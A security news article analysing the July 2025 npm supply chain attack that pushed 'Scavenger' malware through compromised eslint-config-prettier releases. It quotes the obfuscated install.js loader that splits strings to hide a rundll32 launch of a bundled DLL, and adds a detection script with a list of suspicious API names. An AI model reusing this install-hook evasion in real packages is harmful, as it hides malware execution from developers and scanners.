A sophisticated supply chain attack targeting JavaScript developers emerged on Friday, July 18th, 2025, when cybercriminals compromised several popular npm packages to distribute the newly identified "Scavenger" malware.
The attack primarily centered on eslint-config-prettier, a widely used code formatting package, along with several other development tools including eslint-plugin-prettier, synckit, @pkgr/core, and napi-postinstall.
The compromise was discovered when GitHub users reported suspicious releases of eslint-config-prettier appearing in the npm registry despite no corresponding code changes being reflected in the project's GitHub repository.
Phishing Email Received by npm Package Maintainer (Source – Humpty's RE Blog)
The package maintainer later confirmed their npm account had been compromised through a phishing email campaign, allowing attackers to publish malicious versions across multiple package versions including 8.10.1, 9.1.1, 10.1.6, and 10.1.7.
Humpty's RE blog identified the malware family as "Scavenger" because of multiple references to the strings "SCVNGR" and "Scavenger" found throughout the malware variants.
The attack represents a significant escalation in supply chain threats, as it specifically targets the developer ecosystem through trusted development tools that are routinely installed in JavaScript projects worldwide.
The malware's impact extends beyond typical information stealing, as it specifically targets Chromium-based browsers and their associated data stores, including Extensions, ServiceWorkerCache, DawnWebGPUCache, and Visited Links.
This targeting suggests the attackers are particularly interested in harvesting developer credentials, session tokens, and browsing patterns from software development professionals who commonly use these tools.
Infection Mechanism and Code Execution
The Scavenger malware employs a sophisticated infection vector through the compromised eslint-config-prettier package.
Upon installation, the malicious package executes an install.js file containing a deceptively named logDiskSpace() function that serves as the initial payload delivery mechanism.
String decryption routine (Source – Humpty's RE Blog)
The function contains deliberately obfuscated JavaScript code that checks for Windows systems before executing the malicious payload:
const os = require('os');
const path = require('path');

function logDiskSpace() {
  try {
    if (os.platform() == 'win32') {
      const tempDir = os.tmpdir();
      // child_process.spawn('rundll32', ['<pkgdir>/node-gyp.dll,main']) with every
      // tell-tale name split into pieces so plain string matching misses it
      require('chi' + 'ld_pro' + 'cess')['sp' + 'awn'](
        'rund' + 'll32',
        [path.join(__dirname, './node-gyp' + '.dll') + ',main']);
    }
  } catch (e) {}
}
This code fragment demonstrates the attackers' use of string concatenation to evade static analysis tools while executing a bundled DLL file named node-gyp.dll using Windows' rundll32.exe utility.
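Two defender-side checks for this incident, written as an added example rather than code from the article or from the affected projects: the first folds split string literals (the `'chi'+'ld_pro'+'cess'` trick above) so hidden API names become visible to a plain text scan, and the second looks a package-lock.json up against the malicious versions the article lists. The sample install.js fragment and lockfile excerpt are constructed; the version list is assumed to apply to eslint-config-prettier.

```javascript
// Names a postinstall script rarely has a legitimate reason to hide.
const SUSPICIOUS = ['child_process', 'spawn', 'exec', 'rundll32'];

// Versions the article lists as maliciously published (assumption: these are
// eslint-config-prettier versions; extend the map for other packages).
const COMPROMISED = { 'eslint-config-prettier': ['8.10.1', '9.1.1', '10.1.6', '10.1.7'] };

// 'chi'+'ld_pro'+'cess' -> 'child_process'; repeated until no pair is left.
function foldConcatenations(src) {
  const pair = /(['"])((?:\\.|(?!\1)[^\\])*)\1\s*\+\s*(['"])((?:\\.|(?!\3)[^\\])*)\3/;
  let out = src, m;
  while ((m = pair.exec(out)) !== null) {
    out = out.slice(0, m.index) + m[1] + m[2] + m[4] + m[1] + out.slice(m.index + m[0].length);
  }
  // obj["spawn"] -> obj.spawn so the name reads like a normal member access
  return out.replace(/\[\s*(['"])([A-Za-z_$][\w$]*)\1\s*\]/g, '.$2');
}

// Returns the suspicious names that only appear after de-obfuscation.
function findHiddenNames(src) {
  const folded = foldConcatenations(src);
  return SUSPICIOUS.filter((n) => folded.includes(n) && !src.includes(n));
}

// Flags entries of a lockfileVersion 2/3 "packages" map that pin a listed version.
function findCompromisedInLockfile(lock, affected = COMPROMISED) {
  const hits = [];
  for (const [key, entry] of Object.entries(lock.packages || {})) {
    const name = key.slice(key.lastIndexOf('node_modules/') + 'node_modules/'.length);
    if ((affected[name] || []).includes(entry.version)) hits.push({ name, version: entry.version });
  }
  return hits;
}

// Constructed sample mirroring the install.js fragment quoted above.
const SAMPLE_INSTALL_JS = `
  require('chi'+'ld_pro'+'cess')["sp"+"awn"]("rund"+"ll32",
    [path.join(__dirname, './node-gyp' + '.dll') + ",main"]);
`;
// Constructed lockfile excerpt with one pinned bad version.
const SAMPLE_LOCK = { lockfileVersion: 3, packages: {
  'node_modules/eslint-config-prettier': { version: '10.1.7' },
  'node_modules/prettier': { version: '3.3.3' } } };

console.log(findHiddenNames(SAMPLE_INSTALL_JS));     // [ 'child_process', 'spawn', 'rundll32' ]
console.log(findCompromisedInLockfile(SAMPLE_LOCK)); // [ { name: 'eslint-config-prettier', version: '10.1.7' } ]
```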
The malware loader, compiled on the same day as the attack (2025-07-18 08:59:38 UTC), incorporates multiple anti-analysis techniques including VM detection through SMBIOS firmware table enumeration and process-space scanning for security tools like Avast, Sandboxie, and Comodo Antivirus.
The malware uses XXTEA block cipher encryption with a specific DELTA value of 0x9e3779b9 for command and control communications, establishing initial contact through base64-encoded responses from compromised infrastructure.